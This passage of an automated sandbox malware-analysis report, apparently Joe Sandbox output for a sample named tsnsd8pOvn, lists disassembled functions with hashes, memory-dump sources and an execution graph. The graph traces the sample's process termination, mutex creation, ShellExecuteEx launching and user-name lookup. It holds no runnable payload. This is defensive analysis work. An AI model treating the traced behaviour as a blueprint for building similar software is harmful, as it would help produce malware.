                                • Opcode ID: f7e626ff5579c3021eee9ff688d97dda4ed926112a089f5786acab6fcf72fc19
                                • Instruction ID: 24218bfe697cf9b6beaa59aaaf5e6f95f113fdc627a646cb844e26da95f80290
                                • Opcode Fuzzy Hash: f7e626ff5579c3021eee9ff688d97dda4ed926112a089f5786acab6fcf72fc19
                                • Instruction Fuzzy Hash: 27E01A30A06614CBDB605B60EE097D477F1EB24316F4480BED10961170DB780ECB8F5E
                                APIs
                                • std::exception::exception.LIBCMT ref: 0225FBF1
                                  • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                • __CxxThrowException@8.LIBCMT ref: 0225FC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                • API String ID: 3662862379-3870166017
                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction ID: 3cd2aca9c7b4cbeb1c62a993a0f4e0202a46b02cec2f1cbb44b527e4dbbc041b
                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction Fuzzy Hash: 59D067B5C1030CBBCB04EFA5D459CDDBBB9AA04744B408466A91897245EA74E3998F94
                                APIs
                                  • Part of subcall function 0223197D: __wfsopen.LIBCMT ref: 02231988
                                • _fgetws.LIBCMT ref: 0221D15C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                • API String ID: 853134316-0
                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction ID: 33f3d2ee45880dfa582efd98ba17f6baac15f36af19708685b89d6f83a805c70
                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction Fuzzy Hash: 1A91A1B1D2031AEBCB25DFE4CC44BAEB7F5BF14304F140529E815A7245E7B6AA14CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                • API String ID: 1783060780-0
                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction ID: 724a4720dfe1e748edc227a24592de93b31c656b1134eac511799c75364f0604
                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction Fuzzy Hash: F0A16FB1C10348EBEF11EFE4C849BEEBBB6AF14304F140128D40576295D7B65A98CFA6
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction ID: 264030b789cc007f18cf57b33973c5a6856e714930f47f99dc449cecc1c1f30a
                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction Fuzzy Hash: E85193F0A20306DBDB268FF988806AE77B6BF40724F148729EC35962D8D7709D51CB40
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: 704adabef952dd1b09671032d883304a57e33983cfa6c46ac939016620490a52
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: 6001363642025ABBCF125EC4DC11EEE3F62BF19358B488415FE5958828D376C5B2AB81
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 022D7A4B
                                  • Part of subcall function 022D8140: ___BuildCatchObjectHelper.LIBCMT ref: 022D8172
                                  • Part of subcall function 022D8140: ___AdjustPointer.LIBCMT ref: 022D8189
                                • _UnwindNestedFrames.LIBCMT ref: 022D7A62
                                • ___FrameUnwindToState.LIBCMT ref: 022D7A74
                                • CallCatchBlock.LIBCMT ref: 022D7A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: 80b361bd606cbc40719eb4f5f96ffbd74a5bc2c22cd7752448e9b903c02e273b
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction Fuzzy Hash: 4401E932010209BBDF12AF95DD00EEA7BBAFF48754F158015FD1866124D77AE961DFA0
                                APIs
                                • __encode_pointer.LIBCMTD ref: 004068D7
                                  • Part of subcall function 00406610: TlsGetValue.KERNEL32(00000002,00406886,CAB8281C), ref: 00406625
                                  • Part of subcall function 00406610: TlsGetValue.KERNEL32(00000002,00000004), ref: 00406646
                                  • Part of subcall function 00406610: __crt_wait_module_handle.LIBCMTD ref: 0040665C
                                  • Part of subcall function 00406610: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406676
                                • __mtterm.LIBCMTD ref: 004068E5
                                • __initptd.LIBCMTD ref: 004068F4
                                • GetCurrentThreadId.KERNEL32 ref: 004068FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Value$AddressCurrentProcThread__crt_wait_module_handle__encode_pointer__initptd__mtterm
                                • String ID:
                                • API String ID: 1673568325-0
                                • Opcode ID: aa5c264eef043635a6a4d737f0be6788e2b09cde4d867cc3199a8e18d750571d
                                • Instruction ID: 9660f59d39fb56ade82ca1f641df0a6eff677e3f469298acb72bb7fbb5292a2c
                                • Opcode Fuzzy Hash: aa5c264eef043635a6a4d737f0be6788e2b09cde4d867cc3199a8e18d750571d
                                • Instruction Fuzzy Hash: F0F0B4B5A00105AFC710EFB4DC45A9EBB74AB88308F1582B9E80AA73D1E636D561CB55
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: ec6ec432462fd9d313dfb0ac09e9a787e7b066cf414d2b5395eda95c5664761b
                                • Instruction ID: 4cae57ddf79c39d5675552b6115618b60da6efa91157dc2b674a2f6bb85c01b5
                                • Opcode Fuzzy Hash: ec6ec432462fd9d313dfb0ac09e9a787e7b066cf414d2b5395eda95c5664761b
                                • Instruction Fuzzy Hash: 94419E70D092598BEF24CF54C4946EEBBB0AF41315F1481AFD8563A2C2C6396E80CF5A
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: 74fe72603f79603b2a3e045f22a909e3ef8e59ed144a1609880730f4c395cea4
                                • Instruction ID: 4cae57ddf79c39d5675552b6115618b60da6efa91157dc2b674a2f6bb85c01b5
                                • Opcode Fuzzy Hash: 74fe72603f79603b2a3e045f22a909e3ef8e59ed144a1609880730f4c395cea4
                                • Instruction Fuzzy Hash: 94419E70D092598BEF24CF54C4946EEBBB0AF41315F1481AFD8563A2C2C6396E80CF5A
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: c655b13c87dadbdad50ae76e5020d21b876a293500f516cf7d05724c07b14e24
                                • Instruction ID: 586c8fc816a6f14237da24c8208b346aa8fdd0ee88eeaf29dfa75beef83920b9
                                • Opcode Fuzzy Hash: c655b13c87dadbdad50ae76e5020d21b876a293500f516cf7d05724c07b14e24
                                • Instruction Fuzzy Hash: C431A070D0D259CBEF24CF54D4946AEBBB0AF01315F2481AFE8563A2C2C6385E81DF1A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale__hextodec__inc__un_inc_isdigit_isxdigit$UpdateUpdate::~_
                                • String ID: p
                                • API String ID: 1652772854-2181537457
                                • Opcode ID: 77af3fe8994412ed81e027be8a7f0b999c3385dfabfa9f1e7a5825cd0fdc4e56
                                • Instruction ID: 0deffdf5ad2c82ffeab31650fa5b70b9ab6192b33619d8124283c14072eb029a
                                • Opcode Fuzzy Hash: 77af3fe8994412ed81e027be8a7f0b999c3385dfabfa9f1e7a5825cd0fdc4e56
                                • Instruction Fuzzy Hash: 072162B4D0426A8ACF25CF55C9503EEBBB1AF45308F1441FFD88576382EA394A81CF49
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID:
                                • String ID: QQ$s*@
                                • API String ID: 0-3432696855
                                • Opcode ID: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
                                • Instruction ID: 6717763b0cfdc194a53b4eb7d4b74d0116d5979edffe42134c9d59cba0394a18
                                • Opcode Fuzzy Hash: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
                                • Instruction Fuzzy Hash: CF0112B1604109EBDB14CF54CA48A9B73B4AB44304F14456AFD06A73C0D779EA51DB59
                                APIs
                                Strings
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00403354
                                • _CrtCheckMemory(), xrefs: 00403348
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: CheckMemory
                                • String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 2067751306-2660621803
                                • Opcode ID: d667119d453669df938e0c29b07545885a029a91b5af6da270094eec42f629c3
                                • Instruction ID: 8e74407d4bdd306bc9fb3ba4b48325dc3a889e0911a14d9008785705de69059f
                                • Opcode Fuzzy Hash: d667119d453669df938e0c29b07545885a029a91b5af6da270094eec42f629c3
                                • Instruction Fuzzy Hash: 6DF065706412459FEB209F2AED877663B9CB78070AF20413BED06A52D1EABD5644458F

                                Execution Graph

                                Execution Coverage:2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:33%
                                Total number of Nodes:810
                                Total number of Limit Nodes:90
                                execution_graph 44673 423f84 44674 423f90 __getstream 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 __getstream 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount __getstream 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 __getstream 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 @_EH4_CallFilterFunc@8 __getstream 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___crtGetEnvironmentStringsW 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44761 428cde __malloc_crt 58 API calls 44760->44761 44762 431fd8 _wparse_cmdline 44760->44762 44761->44762 44762->44693 44764 4321ba _GetLocaleNameFromLanguage 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 _GetLocaleNameFromLanguage 44765->44773 44766 43223a 45124 420bed 58 API calls 2 library calls 44766->45124 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45125 420bed 58 API calls 2 library calls 44770->45125 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45123 42962f 58 API calls __mbschr_l 44773->45123 45126 4242fd 8 API calls 2 library calls 44774->45126 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45127 43aeb5 44779->45127 44780 427c92 __initterm_e 44782 427cb1 _doexit __IsNonwritableInCurrentImage 44780->44782 45130 4219ac 67 API calls __cinit 44780->45130 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45131 40cf10 44784->45131 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45355 4124e0 109 API calls _memset 44788->45355 44789->44790 45145 41d3c0 44790->45145 44793 419fb9 44793->44705 44795 41a022 45148 41d340 44795->45148 44796 41b669 45436 44f23e 59 API calls 2 library calls 44796->45436 44798 41b673 45437 44f23e 59 API calls 2 library calls 44798->45437 44803 41a065 45153 413a90 44803->45153 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45209 412220 44810->45209 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45224 40ef50 44814->45224 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45229 413ea0 44819->45229 44821 420235 60 API calls _TranslateName 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45169 423c92 44824->45169 44827 41a563 44825->44827 44860 41a5db 44827->44860 45250 414690 44827->45250 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45172 411cd0 44831->45172 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45357 411a10 8 API calls 44833->45357 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45356 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45356 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45273 40d240 CoInitialize 44844->45273 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 44861 420c62 _malloc 58 API calls 44859->44861 44860->44833 44860->44838 44860->44841 44860->44848 44864 41a810 _memset 44861->44864 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45359 40e760 95 API calls 44872->45359 45358 413ff0 59 API calls ___crtGetEnvironmentStringsW 44873->45358 44874->44846 44878 41a7d0 44874->44878 45723 41dbd0 95 API calls 4 library calls 44874->45723 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45724 41e690 203 API calls 8 library calls 44877->45724 44878->44846 45360 415c10 44879->45360 44881 41a98c 45375 412840 60 API calls 44881->45375 44883 41a997 45376 410fc0 93 API calls 4 library calls 44883->45376 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45377 412840 60 API calls 44890->45377 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45378 413ff0 59 API calls ___crtGetEnvironmentStringsW 44900->45378 44902 41ab1d 45379 412900 44902->45379 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45384 413ff0 59 API calls ___crtGetEnvironmentStringsW 44908->45384 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45385 413ff0 59 API calls ___crtGetEnvironmentStringsW 44916->45385 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45386 413580 59 API calls 44921->45386 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45387 413580 59 API calls 44926->45387 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45388 413580 59 API calls 44930->45388 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45389 413580 59 API calls 44934->45389 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45390 413580 59 API calls 44938->45390 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45391 413580 59 API calls 44942->45391 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45392 413580 59 API calls 44946->45392 44948 41afe0 45393 413100 59 API calls 44948->45393 44950 41b001 45394 413580 59 API calls 44950->45394 44952 41b025 45395 413100 59 API calls 44952->45395 44954 41b03c 45396 413580 59 API calls 44954->45396 44956 41b059 45397 413100 59 API calls 44956->45397 44958 41b070 45398 413580 59 API calls 44958->45398 44960 41b07c 45399 413100 59 API calls 44960->45399 44962 41b093 45400 413580 59 API calls 44962->45400 44964 41b09f 45401 413100 59 API calls 44964->45401 44966 41b0b6 45402 413580 59 API calls 44966->45402 44968 41b0c2 45403 413100 59 API calls 44968->45403 44970 41b0d9 45404 413580 59 API calls 44970->45404 44972 41b0e5 45405 413100 59 API calls 44972->45405 44974 41b0fc 45406 413580 59 API calls 44974->45406 44976 41b108 44978 41b130 44976->44978 45407 41cdd0 59 API calls 44976->45407 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45408 412de0 59 API calls 44980->45408 44983 41b1c9 44982->44983 45409 412c40 44983->45409 44985 41b1d8 45416 412bf0 59 API calls 44985->45416 44987 41b1ea 45417 40ecb0 60 API calls 2 